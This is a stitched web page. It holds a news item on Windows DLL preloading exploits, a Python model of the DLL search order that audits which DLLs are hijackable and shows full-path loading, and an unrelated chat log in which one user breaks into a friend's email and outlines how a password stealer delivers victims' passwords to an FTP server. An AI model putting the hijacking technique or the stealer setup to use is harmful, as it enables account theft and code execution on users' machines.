passport | The Register
-
A day after Microsoft confirmed a vulnerability in Windows applications that executes malicious code on end-user PCs, the first exploits have been released targeting programs including the Firefox browser, uTorrent BitTorrent client, and Microsoft PowerPoint. The attack code was posted on Tuesday to the Exploit Database. It included exploits for the Wireshark packet sniffer, Windows Live email and Microsoft MovieMaker, in addition to those for the most recent versions of Firefox, uTorrent and PowerPoint. As many as 200 applications may be vulnerable to the so-called binary planting or DLL preloading attacks, according to Mitja Kolsek, CEO of Acros Security, the Slovenia-based company that warned Microsoft of the issue some four months ago. Microsoft said on Monday that the flaw stems from applications that don't explicitly state the full path name of DLL files and other binaries associated with the program. As a result, each application will have to be patched separately, rather than there being a single Windows update. In addition to the four exploits, H D Moore, CSO and chief architect of the Metasploit project, has released an auditing tool to identify vulnerable applications. When combined with a module added to the Metasploit framework for penetration testers and hackers, it provides most of what's needed to exploit vulnerable programs. Both Moore and Kolsek have said that additional software from Microsoft is vulnerable. Redmond's security team has said it's still investigating whether its applications are susceptible. Firefox, uTorrent, and PowerPoint hit by Windows DLL bug | The Register
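The binary-planting problem in the article above comes down to the loader's search order, so here is an added example (not from the article, from Acros Security, or from the Metasploit audit tool) that models that order in Python over a constructed in-memory file system. Given the DLLs an application imports by bare name, it reports which ones an attacker who controls the current directory (for instance a network share holding the document the user opened) or a PATH directory can substitute, and it shows the fix of loading by full path. The host layout, the file names plugin.dll, helper.dll and optional.dll, and the three KnownDLLs listed are assumptions for the demonstration; the directory order itself is Windows' documented search order with SafeDllSearchMode on and off.

```python
"""
Model of the Windows DLL search order, used to show why LoadLibrary("name.dll")
with a bare file name can be hijacked ("binary planting") when that DLL is not
found in the application or system directories.  Added example; the file system
is a constructed set of paths and nothing here touches the real OS.
"""
from dataclasses import dataclass, replace


@dataclass
class Host:
    app_dir: str                                   # directory the EXE was loaded from
    cwd: str                                       # current directory, e.g. the share holding an opened document
    files: frozenset = frozenset()                 # constructed file system: full paths that exist
    system_dir: str = r"C:\Windows\System32"
    system16_dir: str = r"C:\Windows\System"
    windows_dir: str = r"C:\Windows"
    path_dirs: tuple = (r"C:\Windows\System32", r"C:\Windows", r"C:\Tools")   # assumed PATH
    safe_search: bool = True                       # SafeDllSearchMode, on by default since XP SP2
    known_dlls: frozenset = frozenset({"kernel32.dll", "ntdll.dll", "user32.dll"})  # assumed subset


def join(directory, name):
    return directory.rstrip("\\") + "\\" + name


def search_order(host):
    """Directories the loader walks for a bare DLL name, in order."""
    if host.safe_search:
        dirs = [host.app_dir, host.system_dir, host.system16_dir, host.windows_dir, host.cwd]
    else:   # legacy order: the current directory comes right after the application directory
        dirs = [host.app_dir, host.cwd, host.system_dir, host.system16_dir, host.windows_dir]
    return dirs + list(host.path_dirs)


def resolve(host, name):
    """Path the loader maps LoadLibrary(name) to, or None if the load fails."""
    if name[1:3] == ":\\":                         # absolute path given: no search at all
        return name if name in host.files else None
    if name.lower() in host.known_dlls:            # KnownDLLs are always taken from System32
        return join(host.system_dir, name)
    for directory in search_order(host):
        candidate = join(directory, name)
        if candidate in host.files:
            return candidate
    return None


def attacker_wins(host, name, attacker_dir):
    """Does a copy of `name` planted in attacker_dir get loaded instead of a legitimate one?"""
    planted = join(attacker_dir, name)
    trial = replace(host, files=host.files | {planted})
    return resolve(trial, name) == planted


def audit(host, imports, attacker_dir=None):
    """Imported DLL names that an attacker controlling attacker_dir (default: cwd) can hijack."""
    attacker_dir = attacker_dir or host.cwd
    return [n for n in imports if attacker_wins(host, n, attacker_dir)]


def safe_load(host, name):
    """The fix: name the DLL by its full path next to the EXE, so the loader never falls
    through to the current directory or PATH.  Fails closed when the file is absent."""
    return resolve(host, join(host.app_dir, name))


def demo_host(safe_search=True):
    """Constructed host: a vendor app with one private DLL, one plain system DLL, one KnownDLL."""
    app_dir = r"C:\Program Files\Vendor"
    system_dir = r"C:\Windows\System32"
    files = frozenset({
        join(app_dir, "app.exe"),
        join(app_dir, "plugin.dll"),               # shipped next to the EXE
        join(system_dir, "kernel32.dll"),          # KnownDLL
        join(system_dir, "helper.dll"),            # ordinary system DLL, not a KnownDLL
        # "optional.dll" is imported on demand but exists nowhere on this host
    })
    return Host(app_dir=app_dir, cwd=r"\\fileserver\share", files=files, safe_search=safe_search)


if __name__ == "__main__":
    imports = ["kernel32.dll", "plugin.dll", "helper.dll", "optional.dll"]
    print("hijackable from cwd, safe search:  ", audit(demo_host(), imports))
    print("hijackable from cwd, legacy order: ", audit(demo_host(safe_search=False), imports))
    print("hijackable from a PATH directory:  ", audit(demo_host(), imports, r"C:\Tools"))
    print("safe_load(optional.dll) ->", safe_load(demo_host(), "optional.dll"))
```

Run directly, the script reports that only optional.dll is hijackable from the current directory under the default search order, that helper.dll joins it once SafeDllSearchMode is off, and that a writable PATH directory catches the same missing DLL. That is the pattern the per-application patches address: a DLL requested by bare name that is absent from the application and system directories is the one that falls through to attacker-controlled locations, and a full path makes the load fail closed instead.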
-
Andry marin: password:Andrei
Dragoș: wtf?
Dragoș: that's your Messenger password, isn't it?
Andry marin: I sent it by mistake...... it was the password for an archive
After I got into his mail and told him to change his password...
Andry marin: nope
Andry marin: I don't know how to change it
Dragoș: Account Info
Andry marin: and there?
Dragoș: you enter your password once more
Andry marin: yes?
Dragoș: and then you have change password
Andry marin: aaaa
Andry marin: ok
Andry marin: where is this account info
Andry marin: ?
Dragoș: mail, top left
Dragoș: you click on your username
Dragoș: and a menu appears
Dragoș: it's there
Andry marin: done
Dragoș: good
Andry marin: done, pass changed
Dragoș: ok
Dragoș: and next time don't believe what's written on the net
Andry marin: so it's impossible to find it out?
Dragoș: there's no way to crack a yahoo password
Dragoș: it can be found out with a stealer
Andry marin: what's that?
Dragoș: or by trying the passwords one by one
Dragoș: a kind of virus
Andry marin: will you give it to me too?
Dragoș: what? the stealer?
Andry marin: yes
Andry marin: but so that I can use it
Dragoș: there are 1124182301923810923 stealers
Andry marin: not so that you use it on me
Dragoș: on the net
Andry marin: and how is it used
Dragoș: you create one (1) ftp server where the passwords arrive
Dragoș: you create one (1) server which gets sent to the victim
Dragoș: and it's served
Andry marin: aha, let me look for one and try it
Andry marin: can I try it on myself too
Andry marin: /
Andry marin is typing...
Andry marin: ?
Dragoș: yes